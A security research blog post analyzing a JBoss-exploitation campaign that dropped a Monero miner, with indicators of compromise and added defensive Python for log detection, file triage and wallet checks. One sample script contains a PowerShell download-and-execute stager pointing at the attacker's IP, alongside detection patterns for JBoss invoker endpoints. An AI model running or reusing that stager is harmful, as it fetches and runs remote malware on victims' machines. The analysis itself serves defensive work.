Nine Booms Monero Miner

On the afternoon of Friday, February 23rd, the Emagined Security research team reviewed an alert escalated by our Security Operations team: a hit on a JBoss JMXInvokerServlet endpoint.

Nine Boom 1.png

Based on the traffic patterns and the user-agent strings, the team believes the actor used JexBoss, an open-source JBoss exploitation tool, to automate this attack.

The attack payload contained an obvious PowerShell downloader pointing at 200[.]7[.]97[.]205 on port 8086. The IP address is reportedly located in the Netherlands.

Nine Boom 2.png
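Two pieces of the triage above can be turned into reusable tooling: flagging requests to the JBoss invoker endpoints that JexBoss probes, and pulling the download target out of the captured PowerShell stager so it can be written up as an observable. The script below is an added example, not the post's own code; the log lines and the stager text are constructed stand-ins, and the download path /64Kilences.exe is assumed rather than taken from the real win.txt.

```python
"""Spot JBoss invoker exploitation attempts (the pattern JexBoss automates) in web
server access logs, and pull the download target out of a captured PowerShell stager.

Added example, not the post's own tooling. The log lines and the stager text are
constructed stand-ins; the invoker paths are the JBoss endpoints JexBoss is known
to probe, and the download path /64Kilences.exe is assumed, not taken from win.txt.
"""
import re

# JBoss endpoints that deserialize attacker-supplied Java objects or expose the JMX
# console. Assumption: nothing legitimate on the monitored host serves these paths.
INVOKER_PATHS = (
    "/invoker/JMXInvokerServlet",
    "/invoker/EJBInvokerServlet",
    "/jbossmq-httpil/HTTPServerILServlet",
    "/web-console/Invoker",
    "/jmx-console/",
    "/admin-console/",
)

# Apache/nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"'
)

# PowerShell download primitives followed by an http(s) URL.
FETCH_RE = re.compile(
    r"(?:DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|iwr|Start-BitsTransfer)"
    r"\s*\(?\s*['\"]?(?P<url>https?://[^'\"\s)]+)",
    re.IGNORECASE,
)


def find_invoker_hits(lines):
    """Return one record per request that touches a JBoss invoker endpoint.

    A POST to an invoker servlet carries the serialized payload, so it is logged as an
    exploit attempt; GET/HEAD requests are the reconnaissance phase of a JexBoss run."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        if not any(path.lower().startswith(p.lower()) for p in INVOKER_PATHS):
            continue
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "method": m.group("method"),
            "path": path,
            "status": m.group("status"),
            "ua": m.group("ua"),
            "severity": "exploit-attempt" if m.group("method") == "POST" else "probe",
        })
    return hits


def extract_download_targets(stager):
    """Return each fetch in a PowerShell stager as a defanged URL plus host and port,
    ready to be written up as observables."""
    targets = []
    for m in FETCH_RE.finditer(stager):
        url = m.group("url")
        hostport = re.match(r"https?://([^/]+)", url).group(1)
        host, _, port = hostport.partition(":")
        defanged = url.replace(hostport, host.replace(".", "[.]") + (":" + port if port else ""))
        defanged = defanged.replace("http", "hxxp", 1)
        default_port = 443 if url.lower().startswith("https") else 80
        targets.append({"url": defanged, "host": host, "port": int(port) if port else default_port})
    return targets


# Constructed sample data (not the incident's real logs or script).
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Feb/2018:14:02:11 +0000] "GET /jmx-console/ HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [23/Feb/2018:14:02:12 +0000] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 3261 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/Feb/2018:14:03:40 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

SAMPLE_STAGER = r"""
$c = New-Object System.Net.WebClient
$c.DownloadFile("http://200.7.97.205:8086/64Kilences.exe", "$env:TEMP\64Kilences.exe")
Start-Process "$env:TEMP\64Kilences.exe"
"""

if __name__ == "__main__":
    for hit in find_invoker_hits(SAMPLE_LOG):
        print(hit)
    for target in extract_download_targets(SAMPLE_STAGER):
        print(target)
```

Run over real logs, the probe/exploit-attempt split is what lets an analyst tell a JexBoss scan that bounced off a 404 from one that reached a live invoker servlet; the user-agent is carried along because JexBoss's UA is worth pivoting on per site, but is not a reliable signature on its own.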

The team immediately captured the referenced text file (win.txt in the observables below); it was itself a PowerShell script that downloaded a second-stage binary.

Nine Boom 3.png

The two files referenced, 32Kilences.exe and 64Kilences.exe, are 32-bit and 64-bit Windows builds of the same executable. In Hungarian, Kilences means "nine."

The team also found a lin.txt on the same host, which delivers two files for Linux systems:

Nine Boom 4.png

BoomBoom is a 64-bit statically compiled ELF binary, while BoomBoom2 is the 32-bit version.

The team set out to take the binary apart, which the attackers made very easy; the file utility identifies it as a self-extracting archive:

32Kilences.exe:             PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive

Extracting the self-extracting RAR archive yields two new files:

MD5 (run.bat) = ac229848385ba895cffd5523602b7162

MD5 (systemgo.exe) = 646cb81ec7e8aaa93a7580491edeb56e
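The classification the file utility gave above (a PE stub with a RAR archive appended, and the 32-bit versus 64-bit, statically linked ELF droppers) can be reproduced in a few dozen lines of header parsing, which is handy when triaging a batch of samples and producing the MD5/SHA1 pairs for an observables list. The script below is an added example, not the post's own tooling; the samples it runs on are constructed byte blobs with just enough header structure to exercise the checks, and no real malware is embedded.

```python
"""Static triage of dropped artifacts: classify a file the way file(1) did above
(PE stub with an appended RAR self-extracting archive, 32- vs 64-bit ELF, static
vs dynamic linking) and emit the MD5/SHA1 pair used in the observables list.

Added example, not the post's own tooling. The samples are constructed byte blobs
with just enough header structure to exercise the checks; no real malware is embedded.
Assumes little-endian headers, which covers x86/x86-64 samples like these.
"""
import hashlib
import struct

RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"
PT_INTERP = 3  # program header naming the dynamic loader; absent in static builds


def hashes(data):
    return {"md5": hashlib.md5(data).hexdigest(), "sha1": hashlib.sha1(data).hexdigest()}


def describe_pe(data):
    """Report PE architecture and whether a RAR archive is appended after the PE header."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return "MZ executable without PE header"
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]   # COFF Machine field
    arch = {0x14C: "PE32 Intel 80386", 0x8664: "PE32+ x86-64"}.get(
        machine, "PE machine 0x%x" % machine)
    # A WinRAR SFX is a stub executable with the archive appended; the RAR signature
    # past the PE header is what makes file(1) say "RAR self-extracting archive".
    for magic in (RAR4_MAGIC, RAR5_MAGIC):
        off = data.find(magic, e_lfanew)
        if off != -1:
            return "%s, RAR self-extracting archive (archive at offset 0x%x)" % (arch, off)
    return arch


def describe_elf(data):
    """Report ELF bitness and whether it is statically linked (no PT_INTERP segment)."""
    ei_class = data[4]
    if ei_class == 1:                                   # ELFCLASS32
        phoff = struct.unpack_from("<I", data, 28)[0]
        phentsize, phnum = struct.unpack_from("<HH", data, 42)
        bits = 32
    elif ei_class == 2:                                 # ELFCLASS64
        phoff = struct.unpack_from("<Q", data, 32)[0]
        phentsize, phnum = struct.unpack_from("<HH", data, 54)
        bits = 64
    else:
        return "ELF with unknown class"
    has_interp = any(
        struct.unpack_from("<I", data, phoff + i * phentsize)[0] == PT_INTERP
        for i in range(phnum))
    return "ELF %d-bit, %s linked" % (bits, "dynamically" if has_interp else "statically")


def triage(data):
    if data[:2] == b"MZ":
        kind = describe_pe(data)
    elif data[:4] == b"\x7fELF":
        kind = describe_elf(data)
    else:
        kind = "unknown"
    return dict(type=kind, **hashes(data))


def fake_pe(machine, sfx):
    """Constructed stand-in: DOS stub, COFF header, optionally a RAR archive appended."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    coff = b"PE\x00\x00" + struct.pack("<H", machine) + b"\x00" * 18
    image = dos + coff + b"\x00" * 64
    return (image + RAR4_MAGIC + b"<archive bytes>") if sfx else image


def fake_elf(bits, dynamic):
    """Constructed stand-in: ELF header plus program headers (PT_LOAD, plus PT_INTERP if dynamic)."""
    ptypes = [1, PT_INTERP] if dynamic else [1]
    if bits == 64:
        ehsize, phentsize = 64, 56
        hdr = b"\x7fELF\x02\x01\x01" + b"\x00" * 9
        hdr += struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0x400000, ehsize, 0, 0,
                           ehsize, phentsize, len(ptypes), 0, 0, 0)
    else:
        ehsize, phentsize = 52, 32
        hdr = b"\x7fELF\x01\x01\x01" + b"\x00" * 9
        hdr += struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x8048000, ehsize, 0, 0,
                           ehsize, phentsize, len(ptypes), 0, 0, 0)
    phdrs = b"".join(struct.pack("<I", t).ljust(phentsize, b"\x00") for t in ptypes)
    return hdr + phdrs


if __name__ == "__main__":
    for name, blob in [("32Kilences-like", fake_pe(0x14C, True)), ("BoomBoom-like", fake_elf(64, False)),
                       ("BoomBoom2-like", fake_elf(32, False))]:
        print(name, triage(blob))
```

The static-linking test is the same one file(1) applies: a PT_INTERP segment names the dynamic loader, so a binary without one runs without any shared libraries, which is why droppers like BoomBoom are built that way to survive on whatever distribution they land on.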

systemgo.exe is a popular Monero miner, and run.bat gives us all of the important details:

Nine Boom 5.png

The actor's Monero wallet, 45cToD1FzkjAxHRBhYKKLg5utMGENqyamWrY8nLNkVQ4hJgLHex1KNRZcz4finRjMpAYmPxDaXVpN2rV1jMNyXRdMEaH1YA, is clearly visible in the batch file and can be looked up on MineXMR.com:

Nine Boom 6.png

With the actor having earned somewhere around 11 XMR, Monero's price at the time of writing put that at roughly $3,228 USD.

Nine Boom 7.png
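Before pivoting on a wallet pulled out of a miner launcher, it is worth confirming it is actually a Monero mainnet address and not a lookalike or a truncated copy. Monero addresses use a block-based base58 (8 bytes to 11 characters) and decode to 69 bytes: a network byte (18 for a mainnet standard address, which is why they start with "4"), two 32-byte public keys, and a 4-byte checksum. The script below is an added example, not the post's own tooling; it extracts the payout address and pool from a constructed run.bat stand-in (the pool host and flags are assumed, only the wallet is the one quoted above) and runs the structural check. The checksum is Keccak-256 based, which hashlib's sha3_256 does not compute, so it is deliberately not verified here.

```python
"""Extract the mining pool and payout address from a dropped miner launcher and
sanity-check the address as a Monero mainnet standard address.

Added example, not the post's own code. RUN_BAT is a constructed stand-in for run.bat:
the pool host and command-line flags are assumed, only the wallet comes from the sample.
"""
import re

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Monero base58 encodes 8-byte blocks as 11 chars; a trailing partial block maps as below.
FULL_BLOCK_CHARS = 11
TAIL_CHARS_TO_BYTES = {0: 0, 2: 1, 3: 2, 5: 3, 6: 4, 7: 5, 9: 6, 10: 7, 11: 8}
MAINNET_STANDARD = 18   # network byte of a mainnet standard address (starts with '4')
ADDRESS_BYTES = 69      # network byte + spend pubkey + view pubkey + 4-byte checksum

# Standard addresses only: 95 chars starting with '4'. Subaddresses start with '8' and
# integrated addresses are 106 chars; extend the pattern if those turn up.
ADDRESS_RE = re.compile(r"\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b")
# XMRig-style pool argument: -o host:port or --url=stratum+tcp://host:port (assumed syntax).
POOL_RE = re.compile(r"(?:-o|--url)[ =]+(?:stratum\+tcp://)?(?P<host>[A-Za-z0-9.\-]+):(?P<port>\d+)")

ACTOR_WALLET = ("45cToD1FzkjAxHRBhYKKLg5utMGENqyamWrY8nLNkVQ4hJgLHex1KNRZcz4finRjMpAYmPxDaXVpN"
                "2rV1jMNyXRdMEaH1YA")

# Constructed stand-in for run.bat; not the real file's contents.
RUN_BAT = """@echo off
rem constructed launcher: pool host and flags are assumed, only the wallet is from the sample
systemgo.exe -o pool.example.invalid:4444 -u %s -p x
""" % ACTOR_WALLET


def monero_b58_decode(addr):
    """Decode Monero block base58. Returns bytes, or None on a bad character, a block
    that overflows its byte width, or a tail block of impossible length."""
    out = bytearray()
    for i in range(0, len(addr), FULL_BLOCK_CHARS):
        block = addr[i:i + FULL_BLOCK_CHARS]
        nbytes = TAIL_CHARS_TO_BYTES.get(len(block))
        if nbytes is None:
            return None
        value = 0
        for ch in block:
            idx = B58.find(ch)
            if idx < 0:
                return None
            value = value * 58 + idx
        if value >= 1 << (8 * nbytes):
            return None
        out += value.to_bytes(nbytes, "big")
    return bytes(out)


def looks_like_mainnet_address(addr):
    """Structural check only: correct decoded length and mainnet network byte.
    The 4-byte checksum is Keccak-256 (not hashlib.sha3_256) and is not verified here."""
    raw = monero_b58_decode(addr)
    return raw is not None and len(raw) == ADDRESS_BYTES and raw[0] == MAINNET_STANDARD


def extract_miner_config(batch_text):
    """Return the wallets that pass the structural check and the pool endpoints."""
    wallets = [a for a in ADDRESS_RE.findall(batch_text) if looks_like_mainnet_address(a)]
    pools = [(m.group("host"), int(m.group("port"))) for m in POOL_RE.finditer(batch_text)]
    return {"wallets": wallets, "pools": pools}


if __name__ == "__main__":
    print(extract_miner_config(RUN_BAT))
```

The pool host and port are as useful as the wallet: the wallet is what the pool's public stats page is keyed on, while the host:port pair is what to block or alert on at the egress firewall.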

This is evidence that even unskilled attackers can use open-source tooling to make a few dollars.

This campaign has been logged with AlienVault's OTX.

The original win.txt and lin.txt are available here.


Observables:

32Kilences.exe
MD5:  5f980357049bec59acf4fa3f64ad076f
SHA1: 33a714dd10caf6f7e1ecfd7290de02ac0ef565ac

64Kilences.exe
MD5:  41f120f918d226275471e00f1fd7bd2f
SHA1: 4d17be57e35eecf5a7ba6fa54084179527594635

win.txt
MD5:  e7f9375443cd29f771875c185062c6ba
SHA1: 7966aba65e7f64a746ecb34eac14f515156a8145

lin.txt
MD5:  0d3784ddb430cdeb2f0641a68b7715e4
SHA1: bf095c444bcae7aae21a4a823e7f83b42a626547

BoomBoom
MD5:  f75a3ee5fba082e6ccc38373cff39176
SHA1: 2652eea0140a0b0de3a642b9a0263a7f67ce83ac

BoomBoom2
MD5:  2e49d437c95119becb881a3a269832d6
SHA1: 957109bd145306ff38f703d8cd0955f1114c3a85

run.bat (extracted from 32Kilences.exe)
MD5:  ac229848385ba895cffd5523602b7162

systemgo.exe (extracted from 32Kilences.exe)
MD5:  646cb81ec7e8aaa93a7580491edeb56e

IP = 200.7.97.205 PORT: 8086
